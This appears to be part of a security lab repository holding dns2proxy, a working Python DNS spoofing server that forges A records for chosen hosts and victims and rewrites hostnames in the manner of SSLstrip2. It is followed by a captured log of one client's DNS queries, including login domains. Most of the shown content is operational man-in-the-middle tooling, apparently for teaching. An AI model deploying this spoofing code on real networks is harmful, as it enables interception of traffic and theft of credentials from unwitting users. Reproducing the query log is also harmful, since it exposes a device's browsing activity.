- h_size 290 | #get data from the packet 291 | #data = packet[h_size:] 292 | 293 | 294 | ###################### 295 | # DNS SECTION # 296 | ###################### 297 | 298 | def respuestas(name, type): 299 | global Resolver 300 | 301 | DEBUGLOG('Query = ' + name + ' ' + type) 302 | try: 303 | answers = Resolver.query(name, type) 304 | except Exception, e: 305 | DEBUGLOG('Exception...') 306 | return 0 307 | return answers 308 | 309 | 310 | def requestHandler(address, message): 311 | resp = None 312 | dosleep = False 313 | try: 314 | message_id = ord(message[0]) * 256 + ord(message[1]) 315 | DEBUGLOG('msg id = ' + str(message_id)) 316 | if message_id in serving_ids: 317 | DEBUGLOG('I am already serving this request.') 318 | return 319 | serving_ids.append(message_id) 320 | DEBUGLOG('Client IP: ' + address[0]) 321 | prov_ip = address[0] 322 | try: 323 | msg = dns.message.from_wire(message) 324 | try: 325 | op = msg.opcode() 326 | if op == 0: 327 | # standard and inverse query 328 | qs = msg.question 329 | if len(qs) > 0: 330 | q = qs[0] 331 | DEBUGLOG('request is ' + str(q)) 332 | save_req(LOGREQFILE, 'Client IP: ' + address[0] + ' request is ' + str(q) + '\n') 333 | if q.rdtype == dns.rdatatype.A: 334 | DEBUGLOG('Doing the A query....') 335 | resp, dosleep = std_A_qry(msg, prov_ip) 336 | elif q.rdtype == dns.rdatatype.PTR: 337 | #DEBUGLOG('Doing the PTR query....') 338 | resp = std_PTR_qry(msg) 339 | elif q.rdtype == dns.rdatatype.MX: 340 | DEBUGLOG('Doing the MX query....') 341 | resp = std_MX_qry(msg) 342 | elif q.rdtype == dns.rdatatype.TXT: 343 | #DEBUGLOG('Doing the TXT query....') 344 | resp = std_TXT_qry(msg) 345 | elif q.rdtype == dns.rdatatype.AAAA: 346 | #DEBUGLOG('Doing the AAAA query....') 347 | resp = std_AAAA_qry(msg) 348 | else: 349 | # not implemented 350 | resp = make_response(qry=msg, RCODE=4) # RCODE = 4 Not Implemented 351 | else: 352 | # not implemented 353 | resp = make_response(qry=msg, RCODE=4) # RCODE = 4 Not Implemented 354 | 355 | except Exception, e: 356 | DEBUGLOG('got ' + repr(e)) 357 | resp = make_response(qry=msg, RCODE=2) # RCODE = 2 Server Error 358 | DEBUGLOG('resp = ' + repr(resp.to_wire())) 359 | except Exception, e: 360 | DEBUGLOG('got ' + repr(e)) 361 | resp = make_response(id=message_id, RCODE=1) # RCODE = 1 Format Error 362 | DEBUGLOG('resp = ' + repr(resp.to_wire())) 363 | except Exception, e: 364 | # message was crap, not even the ID 365 | DEBUGLOG('got ' + repr(e)) 366 | 367 | if resp: 368 | s.sendto(resp.to_wire(), address) 369 | if dosleep: sleep(1) # Performance downgrade no tested jet 370 | 371 | 372 | def std_PTR_qry(msg): 373 | qs = msg.question 374 | DEBUGLOG( str(len(qs)) + ' questions.') 375 | iparpa = qs[0].to_text().split(' ', 1)[0] 376 | DEBUGLOG('Host: ' + iparpa) 377 | resp = make_response(qry=msg) 378 | hosts = respuestas(iparpa[:-1], 'PTR') 379 | if isinstance(hosts, numbers.Integral): 380 | DEBUGLOG('No host....') 381 | resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN 382 | return resp 383 | 384 | for host in hosts: 385 | DEBUGLOG('Adding ' + host.to_text()) 386 | rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.PTR, host.to_text()) 387 | resp.answer.append(rrset) 388 | 389 | return resp 390 | 391 | 392 | def std_MX_qry(msg): 393 | qs = msg.question 394 | DEBUGLOG(str(len(qs)) + ' questions.') 395 | iparpa = qs[0].to_text().split(' ', 1)[0] 396 | DEBUGLOG('Host: ' + iparpa) 397 | resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN 398 | return resp 399 | #Temporal disable MX responses 400 | resp = make_response(qry=msg) 401 | hosts = respuestas(iparpa[:-1], 'MX') 402 | if isinstance(hosts, numbers.Integral): 403 | DEBUGLOG('No host....') 404 | resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN 405 | return resp 406 | 407 | for host in hosts: 408 | DEBUGLOG('Adding ' + host.to_text()) 409 | rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.MX, host.to_text()) 410 | resp.answer.append(rrset) 411 | 412 | return resp 413 | 414 | 415 | def std_TXT_qry(msg): 416 | qs = msg.question 417 | print str(len(qs)) + ' questions.' 418 | iparpa = qs[0].to_text().split(' ', 1)[0] 419 | print 'Host: ' + iparpa 420 | resp = make_response(qry=msg) 421 | 422 | host = iparpa[:-1] 423 | punto = host.find(".") 424 | dominio = host[punto:] 425 | host = "."+host 426 | spfresponse = '' 427 | if (dominio in dominios) or (host in dominios): 428 | ttl = 1 429 | DEBUGLOG('Alert domain! (TXT) ID: ' + host) 430 | # Here the HANDLE! 431 | #os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip)); 432 | save_req(LOGALERTFILE, 'Alert domain! (TXT) ID: ' + host+ '\n') 433 | if host in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%host 434 | if dominio in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%dominio 435 | DEBUGLOG('Responding with SPF = ' + spfresponse) 436 | rrset = dns.rrset.from_text(iparpa, ttl, dns.rdataclass.IN, dns.rdatatype.TXT, spfresponse) 437 | resp.answer.append(rrset) 438 | return resp 439 | 440 | 441 | hosts = respuestas(iparpa[:-1], 'TXT') 442 | if isinstance(hosts, numbers.Integral): 443 | print 'No host....' 444 | resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN 445 | return resp 446 | 447 | for host in hosts: 448 | print 'Adding ' + host.to_text() 449 | rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.TXT, host.to_text()) 450 | resp.answer.append(rrset) 451 | 452 | return resp 453 | 454 | def std_SPF_qry(msg): 455 | qs = msg.question 456 | print str(len(qs)) + ' questions.' 457 | iparpa = qs[0].to_text().split(' ', 1)[0] 458 | print 'Host: ' + iparpa 459 | resp = make_response(qry=msg) 460 | 461 | # host = iparpa[:-1] 462 | # punto = host.find(".") 463 | # dominio = host[punto:] 464 | # host = "."+host 465 | # if (dominio in dominios) or (host in dominios): 466 | # ttl = 1 467 | # DEBUGLOG('Alert domain! (TXT) ID: ' + host) 468 | # # Here the HANDLE! 469 | # #os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip)); 470 | # save_req(LOGALERTFILE, 'Alert domain! (TXT) ID: ' + host+ '\n') 471 | # if host in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%host 472 | # if dominio in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%dominio 473 | # DEBUGLOG('Responding with SPF = ' + spfresponse) 474 | # rrset = dns.rrset.from_text(iparpa, ttl, dns.rdataclass.IN, dns.rdatatype.TXT, spfresponse) 475 | # resp.answer.append(rrset) 476 | # return resp 477 | 478 | 479 | hosts = respuestas(iparpa[:-1], 'SPF') 480 | if isinstance(hosts, numbers.Integral): 481 | print 'No host....' 482 | resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN 483 | return resp 484 | 485 | for host in hosts: 486 | print 'Adding ' + host.to_text() 487 | rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.SPF, host.to_text()) 488 | resp.answer.append(rrset) 489 | 490 | return resp 491 | 492 | def std_AAAA_qry(msg): 493 | if not Forward: 494 | DEBUGLOG('No host....') 495 | resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN 496 | return resp 497 | qs = msg.question 498 | DEBUGLOG(str(len(qs)) + ' questions.') 499 | iparpa = qs[0].to_text().split(' ', 1)[0] 500 | DEBUGLOG('Host: ' + iparpa) 501 | resp = make_response(qry=msg) 502 | hosts = respuestas(iparpa[:-1], 'AAAA') 503 | 504 | if isinstance(hosts, numbers.Integral): 505 | DEBUGLOG('No host....') 506 | resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN 507 | return resp 508 | 509 | for host in hosts: 510 | DEBUGLOG('Adding ' + host.to_text()) 511 | rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.AAAA, host.to_text()) 512 | resp.answer.append(rrset) 513 | 514 | return resp 515 | 516 | def std_A_qry(msg, prov_ip): 517 | global consultas 518 | global ip1 519 | global ip2 520 | global fake_ips 521 | 522 | dosleep = False 523 | qs = msg.question 524 | DEBUGLOG(str(len(qs)) + ' questions.') 525 | resp = make_response(qry=msg) 526 | for q in qs: 527 | qname = q.name.to_text()[:-1] 528 | DEBUGLOG('q name = ' + qname) 529 | 530 | host = qname.lower() 531 | 532 | dom1 = None 533 | dominio = None 534 | 535 | punto1 = host.rfind(".") 536 | punto2 = host.rfind(".",0,punto1-1) 537 | 538 | if punto1 > -1: 539 | dom1 = host[punto1:] 540 | 541 | if punto2 > -1: 542 | dominio = host[punto2:] 543 | 544 | 545 | # punto = host.find(".") 546 | # dominio = host[punto:] 547 | 548 | if (dominio in dominios) or (dom1 in dominios): 549 | ttl = 1 550 | id = host[:punto2] 551 | if dom1 in dominios: 552 | id = host[:punto1] 553 | dominio = dom1 554 | 555 | if not id=='www': 556 | DEBUGLOG('Alert domain! ID: ' + id) 557 | # Here the HANDLE! 558 | #os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip)); 559 | handler_msg(id) 560 | save_req(LOGALERTFILE, 'Alert domain! ID: ' + id + '\n') 561 | DEBUGLOG('Responding with IP = ' + dominios[dominio]) 562 | rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, dominios[dominio]) 563 | resp.answer.append(rrset) 564 | return resp, dosleep 565 | 566 | if ".%s"%host in dominios: 567 | dominio = ".%s"%host 568 | ttl = 1 569 | DEBUGLOG('Responding with IP = ' + dominios[dominio]) 570 | rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, dominios[dominio]) 571 | resp.answer.append(rrset) 572 | return resp, dosleep 573 | 574 | ips = respuestas(qname.lower(), 'A') 575 | if qname.lower() not in spoof and isinstance(ips, numbers.Integral): 576 | # SSLSTRIP2 transformation 577 | host2 = '' 578 | for from_host in transformation.keys(): 579 | if host.startswith(from_host): 580 | host2 = transformation[from_host]+host.split(from_host)[1] 581 | break 582 | if host2 != '': 583 | DEBUGLOG('SSLStrip transforming host: %s => %s ...' % (host, host2)) 584 | ips = respuestas(host2, 'A') 585 | 586 | #print '>>> Victim: %s Answer 0: %s'%(prov_ip,prov_resp) 587 | 588 | if isinstance(ips, numbers.Integral): 589 | DEBUGLOG('No host....') 590 | resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN 591 | return resp, dosleep 592 | 593 | prov_resp = ips[0] 594 | consultas[prov_ip] = prov_resp 595 | 596 | ttl = 1 597 | if (host not in nospoof) and (prov_ip not in nospoofto) and (len(victims) == 0 or prov_ip in victims): 598 | if host in spoof: 599 | save_req(LOGREQFILE, '!!! Specific host (' + host + ') asked....\n') 600 | for spoof_ip in spoof[host].split(","): 601 | DEBUGLOG('Adding fake IP = ' + spoof_ip) 602 | rrset = dns.rrset.from_text(q.name, 1000, dns.rdataclass.IN, dns.rdatatype.A, spoof_ip) 603 | resp.answer.append(rrset) 604 | return resp, dosleep 605 | elif Forward: 606 | consultas[prov_ip] = prov_resp 607 | #print 'DEBUG: Adding consultas[%s]=%s'%(prov_ip,prov_resp) 608 | if ip1 is not None: 609 | rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, ip1) 610 | DEBUGLOG('Adding fake IP = ' + ip1) 611 | resp.answer.append(rrset) 612 | if ip2 is not None: 613 | #Sleep only when using global resquest matrix 614 | dosleep = True 615 | rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, ip2) 616 | DEBUGLOG('Adding fake IP = ' + ip2) 617 | resp.answer.append(rrset) 618 | if len(fake_ips)>0: 619 | for fip in fake_ips: 620 | rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, fip) 621 | DEBUGLOG('Adding fake IP = ' + fip) 622 | resp.answer.append(rrset) 623 | 624 | if not Forward and prov_ip not in nospoofto: 625 | if len(fake_ips) == 0: 626 | DEBUGLOG('No forwarding....') 627 | resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN 628 | elif len(fake_ips) > 0: 629 | DEBUGLOG('No forwarding (but adding fake IPs)...') 630 | for fip in fake_ips: 631 | rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, fip) 632 | DEBUGLOG('Adding fake IP = ' + fip) 633 | resp.answer.append(rrset) 634 | return resp, dosleep 635 | 636 | for realip in ips: 637 | DEBUGLOG('Adding real IP = ' + realip.to_text()) 638 | rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, realip.to_text()) 639 | resp.answer.append(rrset) 640 | 641 | return resp, dosleep 642 | 643 | 644 | # def std_A2_qry(msg): 645 | # qs = msg.question 646 | # DEBUGLOG(str(len(qs)) + ' questions.') 647 | # iparpa = qs[0].to_text().split(' ',1)[0] 648 | # print 'Host: '+ iparpa 649 | # resp = make_response(qry=msg) 650 | # rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.A, '4.4.45.4') 651 | # resp.answer.append(rrset) 652 | # return resp 653 | 654 | def std_ASPOOF_qry(msg): 655 | global spoof 656 | qs = msg.question 657 | DEBUGLOG(str(len(qs)) + ' questions.') 658 | iparpa = qs[0].to_text().split(' ', 1)[0] 659 | DEBUGLOG('Host: ' + iparpa) 660 | resp = make_response(qry=msg) 661 | 662 | for q in qs: 663 | qname = q.name.to_text()[:-1] 664 | DEBUGLOG('q name = ' + qname) + ' to resolve ' + spoof[qname] 665 | # rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.facebook.com.') 666 | # resp.answer.append(rrset) 667 | # rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.yahoo.com.') 668 | # resp.answer.append(rrset) 669 | # rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.tuenti.com.') 670 | # resp.answer.append(rrset) 671 | # rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.twitter.com.') 672 | # resp.answer.append(rrset) 673 | rrset = dns.rrset.from_text(q.name, 1000, dns.rdataclass.IN, dns.rdatatype.A, spoof[qname]) 674 | resp.answer.append(rrset) 675 | return resp 676 | 677 | 678 | def make_response(qry=None, id=None, RCODE=0): 679 | if qry is None and id is None: 680 | raise Exception, 'bad use of make_response' 681 | if qry is None: 682 | resp = dns.message.Message(id) 683 | # QR = 1 684 | resp.flags |= dns.flags.QR 685 | if RCODE != 1: 686 | raise Exception, 'bad use of make_response' 687 | else: 688 | resp = dns.message.make_response(qry) 689 | resp.flags |= dns.flags.AA 690 | resp.flags |= dns.flags.RA 691 | resp.set_rcode(RCODE) 692 | return resp 693 | 694 | def parse_args(): 695 | 696 | parser = argparse.ArgumentParser() 697 | 698 | parser.add_argument("-N", "--noforward", 699 | help="DNS Fowarding OFF (default ON)", 700 | action="store_true") 701 | 702 | parser.add_argument("-i", "--interface", 703 | help="Interface to use", 704 | default="eth0") 705 | parser.add_argument("-u", "--ip1", 706 | help="First IP to add at the response", 707 | default=None) 708 | 709 | parser.add_argument("-d", "--ip2", 710 | help="Second IP to add at the response", 711 | default=None) 712 | 713 | parser.add_argument("-I", "--ips", 714 | nargs='*', 715 | help="List of IPs to add after ip1,ip2 separated with commas", 716 | default=[]) 717 | 718 | parser.add_argument("-S", "--silent", 719 | help="Silent mode", 720 | action="store_true") 721 | 722 | parser.add_argument("-A", "--adminIP", 723 | help="Administrator IP for no filtering", 724 | default="192.168.0.1") 725 | 726 | args = parser.parse_args() 727 | 728 | return args 729 | 730 | def run(interface=None, 731 | noforward=None, 732 | arg_ip1=None, 733 | arg_ip2=None, 734 | arg_ips=[], 735 | silent=False, 736 | adminIP=None): 737 | 738 | global debug 739 | global dev 740 | global adminip 741 | global ip1 742 | global ip2 743 | global ip3 744 | global Resolver 745 | global s 746 | global serving_ids 747 | global noserv 748 | global sniff 749 | global fake_ips 750 | global Forward 751 | 752 | debug = not silent 753 | dev = interface 754 | adminip = adminIP 755 | ip1 = arg_ip1 756 | ip2 = arg_ip2 757 | Forward = not noforward 758 | 759 | fake_ips = [] 760 | for ip in arg_ips: 761 | fake_ips.append(ip) 762 | 763 | Resolver = dns.resolver.Resolver() 764 | 765 | process_files() 766 | 767 | Resolver.reset() 768 | Resolver.read_resolv_conf(RESOLVCONF) 769 | 770 | signal.signal(signal.SIGUSR1, SIGUSR1_handle) 771 | 772 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 773 | s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 774 | s.bind(('', 53)) 775 | 776 | if Forward: 777 | DEBUGLOG('DNS Forwarding activado....') 778 | else: 779 | DEBUGLOG('DNS Forwarding desactivado....') 780 | 781 | DEBUGLOG('binded to UDP port 53.') 782 | serving_ids = [] 783 | noserv = True 784 | 785 | if ip1 is not None and ip2 is not None and Forward: 786 | sniff = ThreadSniffer() 787 | sniff.start() 788 | 789 | while True: 790 | if noserv: 791 | DEBUGLOG('waiting requests.') 792 | 793 | try: 794 | message, address = s.recvfrom(1024) 795 | noserv = True 796 | except socket.error as (code, msg): 797 | if code != errno.EINTR: 798 | raise 799 | 800 | if noserv: 801 | DEBUGLOG('serving a request.') 802 | requestHandler(address, message) 803 | 804 | if __name__ == '__main__': 805 | 806 | args = parse_args() 807 | 808 | run(args.interface, 809 | noforward=args.noforward, 810 | arg_ip1=args.ip1, 811 | arg_ip2=args.ip2, 812 | arg_ips=args.ips, 813 | silent=args.silent, 814 | adminIP=args.adminIP) 815 | -------------------------------------------------------------------------------- /lab4/dns2proxy/dnsalert.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /lab4/dns2proxy/dnslog.txt: -------------------------------------------------------------------------------- 1 | 2 | 2017-06-27 01:45:27 Client IP: 10.0.0.98 request is connectivitycheck.gstatic.com. IN A 3 | 2017-06-27 01:45:27 Client IP: 10.0.0.98 request is connectivitycheck.gstatic.com. IN A 4 | 2017-06-27 01:45:27 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 5 | 2017-06-27 01:45:28 Client IP: 10.0.0.98 request is epdg.epc.att.net. IN A 6 | 2017-06-27 01:45:28 Client IP: 10.0.0.98 request is edge-mqtt.facebook.com. IN A 7 | 2017-06-27 01:45:28 Client IP: 10.0.0.98 request is mtalk.google.com. IN A 8 | 2017-06-27 01:45:28 Client IP: 10.0.0.98 request is play.googleapis.com. IN A 9 | 2017-06-27 01:45:29 Client IP: 10.0.0.98 request is service.game-mode.net. IN A 10 | 2017-06-27 01:45:29 Client IP: 10.0.0.98 request is graph.facebook.com. IN A 11 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is 44condev.files.wordpress.com. IN A 12 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is fonts.googleapis.com. IN A 13 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is 44con.com. IN A 14 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is translate.googleapis.com. IN A 15 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is accounts.google.com. IN A 16 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is platform.twitter.com. IN A 17 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is r-login.wordpress.com. IN A 18 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is s1.wp.com. IN A 19 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is s0.wp.com. IN A 20 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is s2.wp.com. IN A 21 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 22 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is stats.wp.com. IN A 23 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is www.youtube.com. IN A 24 | 2017-06-27 01:45:31 Client IP: 10.0.0.98 request is connectivitycheck.gstatic.com. IN A 25 | 2017-06-27 01:45:31 Client IP: 10.0.0.98 request is connectivitycheck.gstatic.com. IN A 26 | 2017-06-27 01:45:34 Client IP: 10.0.0.98 request is hackru.org. IN A 27 | 2017-06-27 01:45:34 Client IP: 10.0.0.98 request is webuse.fontawesome.com. IN A 28 | 2017-06-27 01:45:34 Client IP: 10.0.0.98 request is webs3.amazonaws.com. IN A 29 | 2017-06-27 01:45:35 Client IP: 10.0.0.98 request is hackru.org. IN A 30 | 2017-06-27 01:45:35 Client IP: 10.0.0.98 request is www.google.com. IN A 31 | 2017-06-27 01:45:35 Client IP: 10.0.0.98 request is www.google.com. IN A 32 | 2017-06-27 01:45:36 Client IP: 10.0.0.98 request is hackru.org. IN A 33 | 2017-06-27 01:45:36 Client IP: 10.0.0.98 request is web. IN A 34 | 2017-06-27 01:45:36 Client IP: 10.0.0.98 request is wwww.google.com. IN A 35 | 2017-06-27 01:45:37 Client IP: 10.0.0.98 request is clients1.google.com. IN A 36 | 2017-06-27 01:45:37 Client IP: 10.0.0.98 request is jofieahbxrxeye. IN A 37 | 2017-06-27 01:45:37 Client IP: 10.0.0.98 request is qjuoeqx. IN A 38 | 2017-06-27 01:45:37 Client IP: 10.0.0.98 request is ewfofkvzbrtv. IN A 39 | 2017-06-27 01:45:38 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 40 | 2017-06-27 01:45:38 Client IP: 10.0.0.98 request is portal.fb.com. IN A 41 | 2017-06-27 01:45:39 Client IP: 10.0.0.98 request is webmy.mlh.io. IN A 42 | 2017-06-27 01:45:47 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 43 | 2017-06-27 01:45:47 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 44 | 2017-06-27 01:47:50 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 45 | 2017-06-27 01:47:50 Client IP: 10.0.0.98 request is epdg.epc.att.net. IN A 46 | 2017-06-27 01:47:50 Client IP: 10.0.0.98 request is edge-mqtt.facebook.com. IN A 47 | 2017-06-27 01:47:51 Client IP: 10.0.0.98 request is mtalk.google.com. IN A 48 | 2017-06-27 01:47:54 Client IP: 10.0.0.98 request is connectivitycheck.gstatic.com. IN A 49 | 2017-06-27 01:47:54 Client IP: 10.0.0.98 request is connectivitycheck.gstatic.com. IN A 50 | 2017-06-27 01:47:54 Client IP: 10.0.0.98 request is use.fontawesome.com. IN A 51 | 2017-06-27 01:47:54 Client IP: 10.0.0.98 request is webuse.fontawesome.com. IN A 52 | 2017-06-27 01:47:55 Client IP: 10.0.0.98 request is web. IN A 53 | 2017-06-27 01:47:55 Client IP: 10.0.0.98 request is s3.amazonaws.com. IN A 54 | 2017-06-27 01:47:55 Client IP: 10.0.0.98 request is hackru.org. IN A 55 | 2017-06-27 01:47:55 Client IP: 10.0.0.98 request is webs3.amazonaws.com. IN A 56 | 2017-06-27 01:47:55 Client IP: 10.0.0.98 request is www.google.com. IN A 57 | 2017-06-27 01:47:55 Client IP: 10.0.0.98 request is wwww.google.com. IN A 58 | 2017-06-27 01:47:55 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 59 | 2017-06-27 01:47:55 Client IP: 10.0.0.98 request is hackru.org. IN A 60 | 2017-06-27 01:48:00 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 61 | 2017-06-27 01:48:00 Client IP: 10.0.0.98 request is webmy.mlh.io. IN A 62 | 2017-06-27 01:48:00 Client IP: 10.0.0.98 request is portal.fb.com. IN A 63 | 2017-06-27 01:48:01 Client IP: 10.0.0.98 request is static.mlh.io. IN A 64 | 2017-06-27 01:48:01 Client IP: 10.0.0.98 request is webmlh.io. IN A 65 | 2017-06-27 01:48:02 Client IP: 10.0.0.98 request is webfonts.googleapis.com. IN A 66 | 2017-06-27 01:48:03 Client IP: 10.0.0.98 request is webconnect.facebook.net. IN A 67 | 2017-06-27 01:48:03 Client IP: 10.0.0.98 request is clients1.google.com. IN A 68 | 2017-06-27 01:48:03 Client IP: 10.0.0.98 request is www.google-analytics.com. IN A 69 | 2017-06-27 01:48:03 Client IP: 10.0.0.98 request is social.facebook.com. IN A 70 | 2017-06-27 01:48:11 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 71 | 2017-06-27 01:48:25 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 72 | 2017-06-27 01:48:36 Client IP: 10.0.0.98 request is edge-mqtt.facebook.com. IN A 73 | 2017-06-27 01:48:37 Client IP: 10.0.0.98 request is webmy.mlh.io. IN A 74 | 2017-06-27 01:48:43 Client IP: 10.0.0.98 request is webmy.mlh.io. IN A 75 | 2017-06-27 01:48:46 Client IP: 10.0.0.98 request is edge-mqtt.facebook.com. IN A 76 | 2017-06-27 01:48:47 Client IP: 10.0.0.98 request is webmy.mlh.io. IN A 77 | 2017-06-27 01:48:48 Client IP: 10.0.0.98 request is settings.crashlytics.com. IN A 78 | 2017-06-27 01:48:53 Client IP: 10.0.0.98 request is webmy.mlh.io. IN A 79 | 2017-06-27 01:54:08 Client IP: 10.0.0.98 request is connectivitycheck.gstatic.com. IN A 80 | 2017-06-27 01:54:08 Client IP: 10.0.0.98 request is connectivitycheck.gstatic.com. IN A 81 | 2017-06-27 01:54:09 Client IP: 10.0.0.98 request is edge-mqtt.facebook.com. IN A 82 | 2017-06-27 01:54:09 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 83 | 2017-06-27 01:54:09 Client IP: 10.0.0.98 request is epdg.epc.att.net. IN A 84 | 2017-06-27 01:54:11 Client IP: 10.0.0.98 request is mtalk.google.com. IN A 85 | 2017-06-27 01:54:14 Client IP: 10.0.0.98 request is mtalk.google.com. IN A 86 | 2017-06-27 01:54:14 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 87 | 2017-06-27 01:54:19 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 88 | 2017-06-27 01:54:20 Client IP: 10.0.0.98 request is googleads.g.doubleclick.net. IN A 89 | 2017-06-27 01:54:20 Client IP: 10.0.0.98 request is portal.fb.com. IN A 90 | 2017-06-27 01:54:34 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 91 | 2017-06-27 01:55:09 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 92 | 2017-06-27 01:55:09 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 93 | 2017-06-27 01:55:11 Client IP: 10.0.0.98 request is graph.facebook.com. IN A 94 | 2017-06-27 01:55:11 Client IP: 10.0.0.98 request is samizdat.nytimes.com. IN A 95 | 2017-06-27 01:55:19 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 96 | 2017-06-27 01:55:20 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 97 | 2017-06-27 01:55:21 Client IP: 10.0.0.98 request is graph.facebook.com. IN A 98 | 2017-06-27 01:55:21 Client IP: 10.0.0.98 request is samizdat.nytimes.com. IN A 99 | 2017-06-27 01:55:40 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 100 | 2017-06-27 01:59:29 Client IP: 10.0.0.98 request is connectivitycheck.gstatic.com. IN A 101 | 2017-06-27 01:59:29 Client IP: 10.0.0.98 request is connectivitycheck.gstatic.com. IN A 102 | 2017-06-27 01:59:29 Client IP: 10.0.0.98 request is epdg.epc.att.net. IN A 103 | 2017-06-27 01:59:29 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 104 | 2017-06-27 01:59:29 Client IP: 10.0.0.98 request is edge-mqtt.facebook.com. IN A 105 | 2017-06-27 01:59:33 Client IP: 10.0.0.98 request is mtalk.google.com. IN A 106 | 2017-06-27 01:59:35 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 107 | 2017-06-27 01:59:38 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 108 | 2017-06-27 01:59:40 Client IP: 10.0.0.98 request is portal.fb.com. IN A 109 | 2017-06-27 01:59:41 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 110 | 2017-06-27 01:59:45 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 111 | 2017-06-27 01:59:48 Client IP: 10.0.0.98 request is login.yahoo.com. IN A 112 | 2017-06-27 01:59:48 Client IP: 10.0.0.98 request is s.yimg.com. IN A 113 | 2017-06-27 01:59:48 Client IP: 10.0.0.98 request is s1.yimg.com. IN A 114 | 2017-06-27 01:59:48 Client IP: 10.0.0.98 request is sb.scorecardresearch.com. IN A 115 | 2017-06-27 01:59:48 Client IP: 10.0.0.98 request is geo.query.yahoo.com. IN A 116 | 2017-06-27 01:59:48 Client IP: 10.0.0.98 request is google.com. IN A 117 | 2017-06-27 01:59:48 Client IP: 10.0.0.98 request is geo.yahoo.com. IN A 118 | 2017-06-27 01:59:49 Client IP: 10.0.0.98 request is gstatic.com. IN A 119 | 2017-06-27 01:59:49 Client IP: 10.0.0.98 request is ucs.query.yahoo.com. IN A 120 | 2017-06-27 01:59:49 Client IP: 10.0.0.98 request is y.analytics.yahoo.com. IN A 121 | 2017-06-27 01:59:50 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 122 | 2017-06-27 